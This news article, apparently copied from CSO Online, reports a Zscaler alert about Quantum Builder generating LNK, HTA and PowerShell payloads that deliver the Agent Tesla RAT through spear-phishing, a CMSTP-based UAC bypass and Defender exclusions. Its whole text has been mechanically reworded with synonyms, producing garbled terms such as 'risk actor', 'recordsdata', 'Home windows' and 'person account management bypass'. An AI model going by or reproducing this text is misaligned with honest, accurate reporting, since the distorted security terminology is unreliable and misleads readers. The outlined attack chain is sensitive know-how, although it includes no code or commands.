Malware builder makes use of recent ways to hit victims with Agent Tesla RAT – CSO On-line


A lately found malware builder bought on the dark web, Quantum Builder, is being utilized in a brand new marketing campaign that includes recent ways to ship the Agent Tesla .NET-based keylogger and remote access trojan (RAT), based on an alert issued by the ThreatLabz analysis unit of cybersecurity firm Zscaler.

Quantum Builder, often known as Quantum LNK Builder, is used to create malicious shortcut recordsdata. It has been linked to Lazarus—an APT (superior persistent risk) actor linked to North Korea—on account of shared ways, methods, procedures (TTPs) and supply code overlap. “However we can not confidently attribute this marketing campaign to any particular risk actor,” Zscaler famous in a blog post.

Agent Tesla was first detected in 2014. Within the present marketing campaign, Quantum Builder is getting used to generate malicious .lnk, .hta, and PowerShell payloads, which then ship Agent Tesla to the focused machines, based on Zscaler.

“This marketing campaign options enhancements and a shift towards LNK (Home windows shortcut) recordsdata when in comparison with comparable assaults previously,” Zscaler famous. 

Quantum Builder utilized in a string of recent malware assaults

Risk actors are repeatedly evolving their ways and making use of malware builders bought on the cybercrime market. “This Agent Tesla marketing campaign is the newest in a string of assaults by which Quantum Builder has been used to create malicious payloads in campaigns in opposition to numerous organizations,” Zscaler famous. 

The payloads generated by the builder make use of subtle methods reminiscent of

person account management bypass utilizing the Microsoft Connection Supervisor Profile Installer (CMSTP) binary to execute the ultimate payload with administrative privileges, and to carry out Home windows defender exclusions. 

The brand new malware marketing campaign has additionally been seen using a multistaged an infection chain integrating numerous assault vectors, Zscaler stated. It executes PowerShell scripts in-memory to evade detection and can also be seen executing decoys to distract victims after gadgets have been contaminated.

New assaults begin with spear phishing electronic mail

The assault chain begins with a spear-phishing mail that that accommodates a GZIP attachment. The GZIP features a shortcut that’s designed to execute PowerShell code that’s answerable for launching a distant HTML utility utilizing mshta.exe binaries.  

The phishing electronic mail appears to be like like it’s from a Chinese language provider of lump and rock sugar—it has a topic line stating “New Order Affirmation – Guangdong Nanz Expertise co. ltd.”—and  has a malicious .lnk file with a PDF icon.

As soon as the doc is opened, the HTA file decrypts a PowerShell loader script which decrypts and masses one other PowerShell script after performing superior encryption normal decryption and GZIP decompression. 

The decrypted PowerShell script is the Downloader PS Script, which first downloads the Agent Tesla binary from a distant server, after which executes it with administrative privileges by performing a person account management bypass (UAC) utilizing the CMSTP. Agent Tesla is then executed on the goal machine with administrative privileges. 

There was additionally a second variant of Agent Tesla noticed, the place the risk actors used a ZIP file and different subtle strategies to cover their actions. Agent Tesla has been lively since 2014, in 2018 it had greater than 6,300 prospects who pay subscription charges to license the software program. At the moment, Agent Tesla is being bought for $182 a month on the darkish internet, based on Hacker Information. 

Quantum builder was first found by Cyble Analysis Labs in June this 12 months on a cybercrime discussion board. The risk actor claimed within the submit that Quantum Builder can spoof any extension and has over 300 totally different icons accessible for malicious .lnk recordsdata. There was additionally a video posted demonstrating find out how to construct .lnk, .hta, and .iso recordsdata utilizing the malware builder. 

The .hta payload could be created utilizing Quantum Builder by customizing choices reminiscent of payload url, DLL (dynamic hyperlink library), UAC Bypass, and execution path detaails in addition to a time delay to execute the payload.

Copyright © 2022 IDG Communications, Inc.


Comments are closed.